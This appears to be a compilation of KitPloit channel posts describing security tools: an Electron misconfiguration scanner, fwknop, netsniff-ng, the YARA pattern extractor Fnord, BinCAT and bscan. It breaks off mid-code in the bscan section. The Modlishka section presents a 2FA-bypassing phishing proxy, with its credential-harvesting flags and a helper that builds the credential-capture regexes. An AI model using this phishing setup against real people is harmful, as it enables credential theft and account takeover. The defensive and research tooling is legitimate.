Channel: KitPloit - PenTest Tools!

Electronegativity - Tool To Identify Misconfigurations And Security Anti-Patterns In Electron Applications


Electronegativity is a tool to identify misconfigurations and security anti-patterns in Electron-based applications.
It leverages AST and DOM parsing to look for security-relevant configurations, as described in the "Electron Security Checklist - A Guide for Developers and Auditors" whitepaper.
Software developers and security auditors can use this tool to detect and mitigate potential weaknesses and implementation bugs when developing applications using Electron. A good understanding of Electron (in)security is still required when using Electronegativity, as some of the potential issues detected by the tool require manual investigation.
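To make the idea of static detection concrete, here is a minimal, hypothetical sketch of what a misconfiguration check could look like. It is deliberately simplified: it uses line-based regex matching, whereas Electronegativity itself performs real AST and DOM parsing. The patterns shown (nodeIntegration, contextIsolation, webSecurity) are well-known Electron webPreferences settings; everything else is illustrative.

```python
import re

# Simplified illustration (regex-based, NOT the tool's actual AST analysis):
# flag BrowserWindow options that are common Electron security anti-patterns.
CHECKS = [
    (re.compile(r"nodeIntegration\s*:\s*true"), "nodeIntegration enabled"),
    (re.compile(r"contextIsolation\s*:\s*false"), "contextIsolation disabled"),
    (re.compile(r"webSecurity\s*:\s*false"), "webSecurity disabled"),
]

def scan_source(source: str):
    """Return a list of (finding, line_number) for each matched anti-pattern."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for pattern, description in CHECKS:
            if pattern.search(line):
                findings.append((description, lineno))
    return findings

snippet = """
win = new BrowserWindow({
  webPreferences: { nodeIntegration: true, webSecurity: false }
})
"""
print(scan_source(snippet))
```

A finding like "nodeIntegration enabled" is exactly the kind of result that still requires the manual investigation mentioned above, since some applications legitimately need the flagged settings.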
If you're interested in Electron Security, have a look at our BlackHat 2017 research Electronegativity - A Study of Electron Security and keep an eye on the Doyensec's blog.

Installation
Major releases are pushed to NPM and can be simply installed using:
$ npm install @doyensec/electronegativity -g

Usage
$ electronegativity -h
Option            Description
-V                output the version number
-i, --input       input (directory, .js, .htm, .asar)
-o, --output      save the results to a file in csv or sarif format
-h, --help        output usage information
Using electronegativity to look for issues in a directory containing an Electron app:
$ electronegativity -i /path/to/electron/app
Using electronegativity to look for issues in an asar archive and saving the results in a csv file:
$ electronegativity -i /path/to/asar/archive -o result.csv
Note: if you're running into the Fatal Error "JavaScript heap out of memory", you can run node using node --max-old-space-size=4096 electronegativity -i /path/to/asar/archive -o result.csv

Credits
Electronegativity was made possible thanks to the work of Claudio Merloni, Ibram Marzouk, Jaroslav Lobačevski and many other contributors.
This work has been sponsored by Doyensec LLC.



Modlishka - An Open Source Phishing Tool With 2FA Authentication


Modlishka is a flexible and powerful reverse proxy that will take your phishing campaigns to the next level (with minimal effort required on your side).
Enjoy :-)

Features
Some of the most important 'Modlishka' features :
  • Support for the majority of 2FA authentication schemes (by design).
  • No website templates (just point Modlishka to the target domain - in most cases, it will be handled automatically).
  • Full control of "cross-origin" TLS traffic flow from your victims' browsers.
  • Flexible and easily configurable phishing scenarios through configuration options.
  • Pattern based JavaScript payload injection.
  • Stripping the website of all encryption and security headers (back to 90's MITM style).
  • User credential harvesting (with context based on URL parameter passed identifiers).
  • Can be extended with your ideas through plugins.
  • Stateless design. Can be scaled up easily for an arbitrary number of users - ex. through a DNS load balancer.
  • Web panel with a summary of collected credentials and user session impersonation (beta).
  • Written in Go.

Action
"A picture is worth a thousand words":
Modlishka in action against an example 2FA (SMS) enabled authentication scheme:


Note: google.com was chosen here just as a POC.

Installation
Latest source code version can be fetched from here (zip) or here (tar).
Fetch the code with 'go get' :
$ go get -u github.com/drk1wi/Modlishka
Compile the binary and you are ready to go:
$ cd $GOPATH/src/github.com/drk1wi/Modlishka/
$ make


# ./dist/proxy -h


Usage of ./dist/proxy:

-cert string
base64 encoded TLS certificate

-certKey string
base64 encoded TLS certificate key

-certPool string
base64 encoded Certification Authority certificate

-config string
JSON configuration file. Convenient instead of using command line switches.

-credParams string
Credential regexp collector with matching groups. Example: base64(username_regex),base64(password_regex)

-debug
Print debug information

-disableSecurity
Disable security features like anti-SSRF. Disable at your own risk.

-jsRules string
Comma separated list of URL patterns and JS base64 encoded payloads that will be injected.

-listeningAddress string
Listening address (default "127.0.0.1")

-listeningPort string
Listening port (default "443")

-log string
Local file to which fetched requests will be written (appended)

-phishing string
Phishing domain to create - Ex.: target.co

-plugins string
Comma separated list of enabled plugin names (default "all")

-postOnly
Log only HTTP POST requests

-rules string
Comma separated list of 'string' patterns and their replacements.

-target string
Main target to proxy - Ex.: https://target.com

-targetRes string
Comma separated list of target subdomains that need to pass through the proxy

-terminateTriggers string
Comma separated list of URLs from target's origin which will trigger session termination

-terminateUrl string
URL to redirect the client after session termination triggers

-tls
Enable TLS (default false)

-trackingCookie string
Name of the HTTP cookie used to track the victim (default "id")

-trackingParam string
Name of the HTTP parameter used to track the victim (default "id")
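The -credParams flag expects the two collector regexes base64-encoded, as base64(username_regex),base64(password_regex). A small hypothetical helper (the helper itself is not part of Modlishka) can build that value, assuming credentials arrive as ordinary username=/password= POST parameters:

```python
import base64

def make_cred_params(username_regex: str, password_regex: str) -> str:
    """Build the value for Modlishka's -credParams flag:
    base64(username_regex),base64(password_regex)."""
    encode = lambda r: base64.b64encode(r.encode()).decode()
    return f"{encode(username_regex)},{encode(password_regex)}"

# Illustrative regexes with one matching group each, capturing the
# hypothetical 'username' and 'password' POST parameters of a target site.
value = make_cred_params(r"username=([a-zA-Z0-9._%+-]+)", r"password=([^&]+)")
print(value)
```

The printed value can then be passed directly as `-credParams <value>` on the command line.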

Usage
  • Check out the wiki page for a more detailed overview of the tool usage.
  • FAQ (Frequently Asked Questions)
  • Blog post

Credits
Thanks for helping with the code go to Giuseppe Trotta (@Giutro)


Fwknop - Single Packet Authorization & Port Knocking


fwknop implements an authorization scheme known as Single Packet Authorization (SPA) for strong service concealment. SPA requires only a single packet which is encrypted, non-replayable, and authenticated via an HMAC in order to communicate desired access to a service that is hidden behind a firewall in a default-drop filtering stance. The main application of SPA is to use a firewall to drop all attempts to connect to services such as SSH in order to make the exploitation of vulnerabilities (both 0-day and unpatched code) more difficult. Because there are no open ports, any service that is concealed by SPA naturally cannot be scanned for with Nmap. The fwknop project supports four different firewalls: iptables, firewalld, PF, and ipfw across Linux, OpenBSD, FreeBSD, and Mac OS X. There is also support for custom scripts so that fwknop can be made to support other infrastructure such as ipset or nftables.

SPA is essentially next generation Port Knocking (PK), but solves many of the limitations exhibited by PK while retaining its core benefits. PK limitations include a general difficulty in protecting against replay attacks, the fact that asymmetric ciphers and HMAC schemes are usually not possible to support reliably, and the triviality of mounting a DoS attack against a PK server just by spoofing an additional packet into a PK sequence as it traverses the network (thereby convincing the PK server that the client doesn't know the proper sequence). All of these shortcomings are solved by SPA. At the same time, SPA hides services behind a default-drop firewall policy, acquires SPA data passively (usually via libpcap or other means), and implements standard cryptographic operations for SPA packet authentication and encryption/decryption.
SPA packets generated by fwknop leverage HMAC for authenticated encryption in the encrypt-then-authenticate model. Although the usage of an HMAC is currently optional (enabled via the --use-hmac command line switch), it is highly recommended for three reasons:
  1. Without an HMAC, cryptographically strong authentication is not possible with fwknop unless GnuPG is used, but even then an HMAC should still be applied.
  2. An HMAC applied after encryption protects against cryptanalytic CBC-mode padding oracle attacks such as the Vaudenay attack and related trickery (like the more recent "Lucky 13" attack against SSL).
  3. The code required by the fwknopd daemon to verify an HMAC is much more simplistic than the code required to decrypt an SPA packet, so an SPA packet without a proper HMAC isn't even sent through the decryption routines.
The final reason above is why an HMAC should still be used even when SPA packets are encrypted with GnuPG due to the fact that SPA data is not sent through libgpgme functions unless the HMAC checks out first. GnuPG and libgpgme are relatively complex bodies of code, and therefore limiting the ability of a potential attacker to interact with this code through an HMAC operation helps to maintain a stronger security stance. Generating an HMAC for SPA communications requires a dedicated key in addition to the normal encryption key, and both can be generated with the --key-gen option.
fwknop encrypts SPA packets either with the Rijndael block cipher or via GnuPG and associated asymmetric cipher. If the symmetric encryption method is chosen, then as usual the encryption key is shared between the client and server (see the /etc/fwknop/access.conf file for details). The actual encryption key used for Rijndael encryption is generated via the standard PBKDF1 key derivation algorithm, and CBC mode is set. If the GnuPG method is chosen, then the encryption keys are derived from GnuPG key rings.
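The verify-before-decrypt order described above can be sketched in a few lines. This is an illustration only, not fwknop's implementation (fwknopd is written in C and uses Rijndael/GnuPG with PBKDF1-derived keys); here the ciphertext is treated as an opaque blob and the tag is HMAC-SHA256 appended to the packet:

```python
import hmac, hashlib

def verify_then_accept(packet: bytes, hmac_key: bytes):
    """Encrypt-then-authenticate check: the trailing HMAC-SHA256 tag is
    verified first; only packets with a valid tag ever reach the (far more
    complex) decryption routines."""
    if len(packet) <= 32:           # too short to even carry a SHA-256 tag
        return None
    body, tag = packet[:-32], packet[-32:]
    expected = hmac.new(hmac_key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None                 # reject before any decryption code runs
    return body                     # ciphertext now eligible for decryption

key = b"spa-hmac-key"               # hypothetical dedicated HMAC key
ciphertext = b"encrypted-spa-data"  # stands in for the Rijndael/GnuPG blob
packet = ciphertext + hmac.new(key, ciphertext, hashlib.sha256).digest()
print(verify_then_accept(packet, key) == ciphertext)   # valid packet
tampered = packet[:-1] + bytes([packet[-1] ^ 1])       # flip a tag bit
print(verify_then_accept(tampered, key) is None)       # tampered tag rejected
```

Note how the constant-time comparison (hmac.compare_digest) and the "reject before decrypt" ordering together keep attacker-controlled data away from the decryption code path.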

Use Cases
People who use Single Packet Authorization (SPA) or its security-challenged cousin Port Knocking (PK) usually access SSHD running on the same system where the SPA/PK software is deployed. That is, a firewall running on a host has a default-drop policy against all incoming SSH connections so that SSHD cannot be scanned, but a SPA daemon reconfigures the firewall to temporarily grant access to a passively authenticated SPA client:


"Basic SPA usage to access SSHD"
fwknop supports the above, but also goes much further and makes robust usage of NAT (for iptables/firewalld firewalls). After all, important firewalls are usually gateways between networks as opposed to just being deployed on standalone hosts. NAT is commonly used on such firewalls (at least for IPv4 communications) to provide Internet access to internal networks that are on RFC 1918 address space, and also to allow external hosts access to services hosted on internal systems.
Because fwknop integrates with NAT, SPA can be leveraged to access internal services through the firewall by users on the external Internet. Although this has plenty of applications on modern traditional networks, it also allows fwknop to support cloud computing environments such as Amazon's AWS:


"SPA usage on Amazon AWS cloud environments"

User Interface
The official cross-platform fwknop client user interface fwknop-gui (download, github) is developed by Jonathan Bennett. Most major client-side SPA modes are supported including NAT requests, HMAC and Rijndael keys (GnuPG is not yet supported), fwknoprc stanza saving, and more. Currently fwknop-gui runs on Linux, Mac OS X, and Windows - here is a screenshot from OS X:


  "fwknop-gui on Mac OS X"
Similarly, an updated Android client is available as well.

Tutorial
A comprehensive tutorial on fwknop can be found here:
http://www.cipherdyne.org/fwknop/docs/fwknop-tutorial.html

Features
The following is a complete list of features supported by the fwknop project:
  • Implements Single Packet Authorization around iptables and firewalld firewalls on Linux, ipfw firewalls on *BSD and Mac OS X, and PF on OpenBSD.
  • The fwknop client runs on Linux, Mac OS X, *BSD, and Windows under Cygwin. In addition, there is an Android app to generate SPA packets.
  • Supports both Rijndael and GnuPG methods for the encryption/decryption of SPA packets.
  • Supports HMAC authenticated encryption for both Rijndael and GnuPG. The order of operation is encrypt-then-authenticate to avoid various cryptanalytic problems.
  • Replay attacks are detected and thwarted by SHA-256 digest comparison of valid incoming SPA packets. Other digest algorithms are also supported, but SHA-256 is the default.
  • SPA packets are passively sniffed from the wire via libpcap. The fwknopd server can also acquire packet data from a file that is written to by a separate Ethernet sniffer (such as with tcpdump -w <file>), from the iptables ULOG pcap writer, or directly via a UDP socket in --udp-server mode.
  • For iptables firewalls, ACCEPT rules added by fwknop are added and deleted (after a configurable timeout) from custom iptables chains so that fwknop does not interfere with any existing iptables policy that may already be loaded on the system.
  • Supports inbound NAT connections for authenticated SPA communications (iptables firewalls only for now). This means fwknop can be configured to create DNAT rules so that you can reach a service (such as SSH) running on an internal system on an RFC 1918 IP address from the open Internet. SNAT rules are also supported which essentially turns fwknopd into a SPA-authenticating gateway to access the Internet from an internal network.
  • Multiple users are supported by the fwknop server, and each user can be assigned their own symmetric or asymmetric encryption key via the /etc/fwknop/access.conf file.
  • Automatic resolution of external IP address via https://www.cipherdyne.org/cgi-bin/myip (this is useful when the fwknop client is run from behind a NAT device). Because the external IP address is encrypted within each SPA packet in this mode, Man-in-the-Middle (MITM) attacks where an inline device intercepts an SPA packet and only forwards it from a different IP in an effort to gain access are thwarted.
  • Port randomization is supported for the destination port of SPA packets as well as the port over which the follow-on connection is made via the iptables NAT capabilities. The latter applies to forwarded connections to internal services and to access granted to local sockets on the system running fwknopd.
  • Integration with Tor (as described in this DefCon 14 presentation). Note that because Tor uses TCP for transport, sending SPA packets through the Tor network requires that each SPA packet is sent over an established TCP connection, so technically this breaks the "single" aspect of "Single Packet Authorization". However, Tor provides anonymity benefits that can outweigh this consideration in some deployments.
  • Implements a versioned protocol for SPA communications, so it is easy to extend the protocol to offer new SPA message types and maintain backwards compatibility with older fwknop clients at the same time.
  • Supports the execution of shell commands on behalf of valid SPA packets.
  • The fwknop server can be configured to place multiple restrictions on inbound SPA packets beyond those enforced by encryption keys and replay attack detection. Namely, packet age, source IP address, remote user, access to requested ports, and more.
  • Bundled with fwknop is a comprehensive test suite that issues a series of tests designed to verify that both the client and server pieces of fwknop work properly. These tests involve sniffing SPA packets over the local loopback interface, building temporary firewall rules that are checked for the appropriate access based on the testing config, and parsing output from both the fwknop client and fwknopd server for expected markers for each test. Test suite output can easily be anonymized for communication to third parties for analysis.
  • fwknop was the first program to integrate port knocking with passive OS fingerprinting. However, Single Packet Authorization offers many security benefits beyond port knocking, so the port knocking mode of operation is generally deprecated.
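The replay detection mentioned in the feature list (SHA-256 digest comparison of valid incoming SPA packets) can be sketched as a simple digest cache. This is an illustration of the idea, not fwknopd's actual C implementation:

```python
import hashlib

class ReplayCache:
    """Sketch of SPA replay detection: remember the SHA-256 digest of every
    accepted packet and reject any packet whose digest was seen before."""
    def __init__(self):
        self._seen = set()

    def accept(self, packet: bytes) -> bool:
        digest = hashlib.sha256(packet).hexdigest()
        if digest in self._seen:
            return False          # replayed packet: drop it
        self._seen.add(digest)
        return True

cache = ReplayCache()
pkt = b"example-spa-packet"
print(cache.accept(pkt))   # first occurrence is accepted
print(cache.accept(pkt))   # identical packet is rejected as a replay
```

Because every valid SPA packet includes random data, two legitimate access requests never hash to the same digest, so a digest match can only mean a replay.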

Building fwknop
This distribution uses GNU autoconf for setting up the build. Please see the INSTALL file for the general basics on using autoconf.
There are some "configure" options that are specific to fwknop. They are (extracted from ./configure --help):
  --disable-client        Do not build the fwknop client component. The
                          default is to build the client.
  --disable-server        Do not build the fwknop server component. The
                          default is to build the server.
  --with-gpgme            support for gpg encryption using libgpgme
                          [default=check]
  --with-gpgme-prefix=PFX prefix where GPGME is installed (optional)
  --with-gpg=/path/to/gpg Specify path to the gpg executable that gpgme will
                          use [default=check path]
  --with-firewalld=/path/to/firewalld
                          Specify path to the firewalld executable
                          [default=check path]
  --with-iptables=/path/to/iptables
                          Specify path to the iptables executable
                          [default=check path]
  --with-ipfw=/path/to/ipfw
                          Specify path to the ipfw executable
                          [default=check path]
  --with-pf=/path/to/pfctl
                          Specify path to the pf executable
                          [default=check path]
  --with-ipf=/path/to/ipf Specify path to the ipf executable
                          [default=check path]

Examples:

./configure --disable-client --with-firewalld=/bin/firewall-cmd
./configure --disable-client --with-iptables=/sbin/iptables --with-firewalld=no


Netsniff-Ng - A Swiss Army Knife For Your Daily Linux Network Plumbing


netsniff-ng is a free Linux networking toolkit, a Swiss army knife for your daily Linux network plumbing if you will.
Its gain of performance is reached by zero-copy mechanisms, so that on packet reception and transmission the kernel does not need to copy packets from kernel space to user space and vice versa.
Our toolkit can be used for network development and analysis, debugging, auditing or network reconnaissance.

The netsniff-ng toolkit consists of the following utilities:
  • netsniff-ng, a fast zero-copy analyzer, pcap capturing and replaying tool
  • trafgen, a multithreaded low-level zero-copy network packet generator
  • mausezahn, high-level packet generator for HW/SW appliances with Cisco-CLI*
  • bpfc, a Berkeley Packet Filter compiler, Linux BPF JIT disassembler
  • ifpps, a top-like kernel networking statistics tool
  • flowtop, a top-like netfilter connection tracking tool
  • curvetun, a lightweight curve25519-based IP tunnel
  • astraceroute, an autonomous system (AS) trace route utility
Get it via Git:   git clone git://github.com/netsniff-ng/netsniff-ng.git


Tools

netsniff-ng is a fast network analyzer based on packet mmap(2) mechanisms. It can record pcap files to disc, replay them and also do an offline and online analysis. Capturing, analysis or replay of raw 802.11 frames are supported as well. pcap files are also compatible with tcpdump or Wireshark traces. netsniff-ng processes those pcap traces either in scatter-gather I/O or by mmap(2) I/O.
trafgen is a multi-threaded network traffic generator based on packet mmap(2) mechanisms. It has its own flexible, macro-based low-level packet configuration language. Injection of raw 802.11 frames are supported as well. trafgen has a significantly higher speed than mausezahn and comes very close to pktgen, but runs from user space. pcap traces can also be converted into a trafgen packet configuration.
mausezahn is a high-level packet generator that can run on a hardware-software appliance and comes with a Cisco-like CLI. It can craft nearly every possible or impossible packet. Thus, it can be used, for example, to test network behaviour under strange circumstances (stress test, malformed packets) or to test hardware-software appliances for several kind of attacks.
bpfc is a Berkeley Packet Filter (BPF) compiler that understands the original BPF language developed by McCanne and Jacobson. It accepts BPF mnemonics and converts them into kernel/netsniff-ng readable BPF "opcodes". It also supports undocumented Linux filter extensions. This can be especially useful for more complicated filters that high-level filters fail to support.
ifpps is a tool which periodically provides top-like networking and system statistics from the Linux kernel. It gathers statistical data directly from procfs files and does not apply any user space traffic monitoring that would falsify statistics on high packet rates. For wireless, data about link connectivity is provided as well.
flowtop is a top-like connection tracking tool that can run on an end host or router. It is able to present TCP or UDP flows that have been collected by the kernel's netfilter framework. GeoIP and TCP state machine information is displayed. Also, on end hosts flowtop can show PIDs and application names that flows relate to. No user space traffic monitoring is done, thus all data is gathered by the kernel.
curvetun is a lightweight, high-speed ECDH multiuser tunnel for Linux. curvetun uses the Linux TUN/TAP interface and supports {IPv4,IPv6} over {IPv4,IPv6} with UDP or TCP as carrier protocols. Packets are encrypted end-to-end by a symmetric stream cipher (Salsa20) and authenticated by a MAC (Poly1305), where keys have previously been computed with the ECDH key agreement protocol (Curve25519).
astraceroute is an autonomous system (AS) trace route utility. Unlike traceroute or tcptraceroute, it displays not only the hops, but also the AS they belong to, as well as GeoIP information and other interesting details. By default, it uses a TCP probe packet and falls back to ICMP probes in case no answer has been received.
In conclusion, the toolkit is split into small, useful utilities that may or may not be related to each other. Each program fills a gap as a helper in your daily network debugging, development or auditing.
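As an aside, the procfs-based approach that ifpps uses can be illustrated with a short sketch. The sample below is a hypothetical, abbreviated /proc/net/dev-style snippet (the real file carries more counters per interface), inlined so the example does not depend on running on Linux:

```python
# Sketch of ifpps-style statistics gathering: parse /proc/net/dev-format
# text instead of sniffing traffic, so high packet rates are not falsified.
SAMPLE = """\
Inter-|   Receive                |  Transmit
 face |bytes    packets errs drop|bytes    packets errs drop
  eth0: 1843244    1523    0    0  524288     901    0    0
    lo:   10240      80    0    0   10240      80    0    0
"""

def parse_net_dev(text: str):
    stats = {}
    for line in text.splitlines()[2:]:          # skip the two header lines
        name, data = line.split(":", 1)
        fields = data.split()
        stats[name.strip()] = {
            "rx_bytes": int(fields[0]),
            "rx_packets": int(fields[1]),
            "tx_bytes": int(fields[4]),
            "tx_packets": int(fields[5]),
        }
    return stats

print(parse_net_dev(SAMPLE)["eth0"]["rx_packets"])
```

On a real Linux host the same parser would be pointed at open("/proc/net/dev") and sampled periodically to compute rates.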

Fnord - Pattern Extractor For Obfuscated Code


Fnord is a pattern extractor for obfuscated code

Description
Fnord has two main functions:
  1. Extract byte sequences and create some statistics
  2. Use these statistics, combine length, number of occurrences, similarity and keywords to create a YARA rule

1. Statistics
Fnord processes the file with a sliding window of varying size to extract all sequences with a minimum length -m X (default: 4) up to a maximum length -x X (default: 40). For each length, Fnord will present the most frequently occurring sequences -t X (default: 3) in a table.
Each line in the table contains:
  • Length
  • Number of occurrences
  • Sequence (string)
  • Formatted (ascii/wide/hex)
  • Hex encoded form
  • Entropy
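The sliding-window extraction described above can be sketched in a few lines of Python. This is a simplified illustration of the idea (defaults mirror -m 4, -x 40, -t 3), not Fnord's actual code:

```python
from collections import Counter

def extract_sequences(data: bytes, min_len=4, max_len=40, top=3):
    """Sliding-window extraction in the spirit of Fnord: for every length
    from min_len to max_len, count all byte sequences of that length and
    keep the `top` most frequent ones."""
    results = {}
    for length in range(min_len, max_len + 1):
        counts = Counter(data[i:i + length]
                         for i in range(len(data) - length + 1))
        results[length] = counts.most_common(top)
    return results

data = b"ABCDABCDABCDxyz"
top4 = extract_sequences(data, min_len=4, max_len=4)[4]
print(top4[0])  # (b'ABCD', 3): most frequent length-4 sequence
```

Real obfuscated samples yield long tables of such candidates, which is why the statistics (occurrences, entropy) matter for picking the interesting ones.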

2. YARA Rule Creation
Fnord also generates an experimental YARA rule. During YARA rule creation it calculates a score based on the length of the sequence and the number of occurrences (length * occurrences). It then processes each sequence by removing all non-letter characters and comparing it with a list of keywords (case-insensitive) to detect sequences that are more interesting than others. Before writing each string to the rule, Fnord calculates a Levenshtein distance and skips sequences that are too similar to sequences that have already been integrated into the rule.
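The scoring and deduplication steps can be sketched as follows. The keyword list, thresholds, and "too similar" rule here are hypothetical stand-ins (the real defaults are -k 2.0 for the keyword multiplier and -s 1.5 for similarity), but the shape of the computation matches the description above:

```python
def levenshtein(a: str, b: str) -> int:
    """Classic dynamic-programming edit distance."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1,
                           prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

KEYWORDS = {"eval", "exec", "powershell"}   # illustrative keyword list

def score(seq: str, occurrences: int, keyword_multiplier=2.0) -> float:
    """Score = length * occurrences, boosted when the letters-only form
    of the sequence matches a keyword (case-insensitive)."""
    s = float(len(seq) * occurrences)
    letters = "".join(c for c in seq if c.isalpha()).lower()
    if any(k in letters for k in KEYWORDS):
        s *= keyword_multiplier
    return s

def select_strings(scored, max_similarity=1.5):
    """Walk candidates best-first; skip any sequence whose edit distance to
    an already selected string falls below len(seq) / max_similarity."""
    selected = []
    for seq, _ in sorted(scored, key=lambda x: -x[1]):
        if all(levenshtein(seq, s) >= len(seq) / max_similarity
               for s in selected):
            selected.append(seq)
    return selected

cands = [("eval(", 10), ("evall(", 9), ("window.x", 4)]
scored = [(s, score(s, n)) for s, n in cands]
print(select_strings(scored))  # 'eval(' is dropped as near-duplicate
```

Here "eval(" is skipped because it sits one edit away from the higher-scoring "evall(", which is exactly the kind of redundancy the Levenshtein filter removes from the generated rule.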

Status
[Experimental] Fnord was created a few days ago and I have tested it with a handful of samples. My guess is that I'll adjust the defaults in the coming weeks and add some more keywords, filters, and scoring options.

Improve the Results
If you've found obfuscated code in a sample, use a hex editor to extract the obfuscated section of the sample and save to a new file. Use that new file for the analysis.
Play with the flags -s, -k, -r, --yara-strings, -m and -e.
Please send me samples that produce weak YARA rules that could be better.

Usage
     ____                 __
    / __/__  ___  _______/ /
   / _// _ \/ _ \/ __/ _  /
  /_/ /_//_/\___/_/  \_,_/   Pattern Extractor for Obfuscated Code
                             v0.6, Florian Roth

usage: fnord.py [-h] [-f file] [-m min] [-x max] [-t top] [-n min-occ]
[-e min-entropy] [--strings] [--include-padding] [--debug]
[--noyara] [-s similarity] [-k keywords-multiplier]
[-r structure-multiplier] [-c count-limiter] [--yara-exact]
[--yara-strings max] [--show-score] [--show-count]
[--author author]

Fnord - Pattern Extractor for Obfuscated Code

optional arguments:
-h, --help show this help message and exit
-f file File to process
-m min Minimum sequence length
-x max Maximum sequence length
-t top Number of items in the Top x list
-n min-occ Minimum number of occurrences to show
-e min-entropy Minimum entropy
--strings Show strings only
--include-padding Include 0x00 and 0x20 in the extracted strings
--debug Debug output

YARA Rule Creation:
--noyara Do not generate an experimental YARA rule
-s similarity Allowed similarity (use values between 0.1=low and
10=high, default=1.5)
-k keywords-multiplier
Keywords multiplier (multiplies score of sequences if
keyword is found) (best use values between 1 and 5,
default=2.0)
-r structure-multiplier
Structure multiplier (multiplies score of sequences if
it is identified as code structure and not payload)
(best use values between 1 and 5, default=2.0)
-c count-limiter Count limiter (limits the impact of the count by
capping it at a certain amount) (best use values
between 5 and 100, default=20)
--yara-exact Add magic header and magic footer limitations to the
rule
--yara-strings max Maximum sequence length
--show-score Show score in comments of YARA rules
--show-count Show count in sample in comments of YARA rules
--author author YARA rule author

Getting Started
  1. git clone https://github.com/Neo23x0/Fnord.git and cd Fnord
  2. pip3 install -r ./requirements.txt
  3. python3 ./fnord.py --help

Examples
python3 fnord.py -f ./test/wraeop.sct --yara-strings 10
python3 fnord.py -f ./test/vbs.txt --show-score --show-count -t 1 -x 20
python3 fnord.py -f ./test/inv-obf.txt --show-score --show-count -t 1 --yara-strings 4 --yara-exact

Screenshots




FAQs

Why didn't you integrate Fnord in yarGen?
yarGen uses a white-listing approach to filter the strings that are best for the creation of a YARA rule. yarGen applies some regular expressions to adjust scores of strings before creating the YARA rules. But its approach is very different to the method used by Fnord, which calculates the score of the byte sequences based on statistics.
While yarGen is best used for un-obfuscated code, Fnord is meant for obfuscated code only and should produce much better results than yarGen in that case.

Contact
Follow on Twitter for updates @cyb3rops


Bincat - Binary Code Static Analyser, With IDA Integration


BinCAT is a static Binary Code Analysis Toolkit, designed to help reverse engineers, directly from IDA.
It features:
  • value analysis (registers and memory)
  • taint analysis
  • type reconstruction and propagation
  • backward and forward analysis
  • use-after-free and double-free detection

In action
You can check (an older version of) BinCAT in action here:
Check the tutorial out to see the corresponding tasks.

Quick FAQ
Supported host platforms:
  • IDA plugin: all, version 6.9 or later (BinCAT uses PyQt, not PySide)
  • analyzer (local or remote): Linux, Windows, macOS (maybe)
Supported CPU for analysis (for now):
  • x86-32
  • ARMv7
  • ARMv8
  • PowerPC

Installation
Only IDA v6.9 or later (including 7) is supported

Binary distribution install (recommended)
The binary distribution includes everything needed:
  • the analyzer
  • the IDA plugin
Install steps:
  • Extract the binary distribution of BinCAT (not the git repo)
  • In IDA, click on "File -> Script File..." menu (or type ALT-F7)
  • Select install_plugin.py
  • BinCAT is now installed in your IDA user dir
  • Restart IDA

Manual installation

Analyzer
The analyzer can be used locally or through a Web service.
On Linux:
On Windows:

IDA Plugin
BinCAT should work with IDA on Wine, once pip is installed:

Using BinCAT

Quick start
  • Load the plugin by using the Ctrl-Shift-B shortcut, or using the Edit -> Plugins -> BinCAT menu
  • Go to the instruction where you want to start the analysis
  • Select the BinCAT Configuration pane, click <-- Current to define the start address
  • Launch the analysis

Configuration
Global options can be configured through the Edit/BinCAT/Options menu.
Default config and options are stored in $IDAUSR/idabincat/conf.

Options
  • "Use remote bincat": select if you are running the analyzer in a Docker container
  • "Remote URL": http://localhost:5000 (or the URL of a remote BinCAT server)
  • "Autostart": autoload BinCAT at IDA startup
  • "Save to IDB": default state for the save to idb checkbox

Documentation
A manual is provided; check here for a description of the configuration file format.
A tutorial is provided to help you try BinCAT's features.

Article and presentations about BinCAT



Bscan - An Asynchronous Target Enumeration Tool



Synopsis
bscan is a command-line utility to perform active information gathering and service enumeration. At its core, bscan asynchronously spawns processes of well-known scanning utilities, repurposing scan results into highlighted console output and a well-defined directory structure.

Installation
bscan was written to be run on Kali Linux, but there is nothing inherently preventing it from running on any OS with the appropriate tools installed.
Download the latest packaged version from PyPI:
pip install bscan
Or get the bleeding-edge version from version control:
pip install https://github.com/welchbj/bscan/archive/master.tar.gz

Basic Usage
bscan has a wide variety of configuration options which can be used to tune scans to your needs. Here's a quick example:
$ bscan \
> --max-concurrency 3 \
> --patterns [Mm]icrosoft \
> --status-interval 10 \
> --verbose-status \
> scanme.nmap.org
What's going on here?
  • --max-concurrency 3 means that no more than 3 concurrent scan subprocesses will be run at a time
  • --patterns [Mm]icrosoft defines a custom regex pattern with which to highlight matches in the generated scan output
  • --status-interval 10 tells bscan to print runtime status updates every 10 seconds
  • --verbose-status means that each of these status updates will print details of all currently-running scan subprocesses
  • scanme.nmap.org is the host we want to enumerate
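The "asynchronously spawns processes" behavior with a concurrency cap can be sketched with asyncio. This is an illustration of the pattern, not bscan's source; `echo` commands stand in for the real scanning utilities:

```python
import asyncio

async def run_scan(cmd: str, semaphore: asyncio.Semaphore) -> str:
    """Spawn one scanner subprocess; the shared semaphore caps how many
    subprocesses run at once (the --max-concurrency idea)."""
    async with semaphore:
        proc = await asyncio.create_subprocess_shell(
            cmd, stdout=asyncio.subprocess.PIPE)
        stdout, _ = await proc.communicate()
        return stdout.decode()

async def main():
    semaphore = asyncio.Semaphore(3)             # --max-concurrency 3
    cmds = [f"echo scan-{i}" for i in range(5)]  # stand-ins for real scanners
    results = await asyncio.gather(*(run_scan(c, semaphore) for c in cmds))
    return [r.strip() for r in results]

print(asyncio.run(main()))
```

Only three of the five subprocesses can hold the semaphore at any moment; the other two wait, which is how a scan of a large network avoids saturating the machine.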
bscan also relies on some additional configuration files. The default files can be found in the bscan/configuration directory and serve the following purposes:
  • patterns.txt specifies the regex patterns to be highlighted in console output when matched with scan output
  • required-programs.txt specifies the installed programs that bscan plans on using
  • port-scans.toml defines the port-discovering scans to be run on the target(s), as well as the regular expressions used to parse port numbers and service names from scan output
  • service-scans.toml defines the scans to be run on the target(s) on a per-service basis
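The pattern-highlighting behavior (from --patterns or patterns.txt) can be sketched with a few lines of regex substitution. This is a hypothetical illustration of the idea, not bscan's implementation:

```python
import re

ANSI_RED = "\033[31m"
ANSI_RESET = "\033[0m"

def highlight(text: str, patterns) -> str:
    """Wrap every regex match in ANSI color codes, bscan-style, so that
    interesting strings stand out in the console output."""
    for pattern in patterns:
        text = re.sub(pattern,
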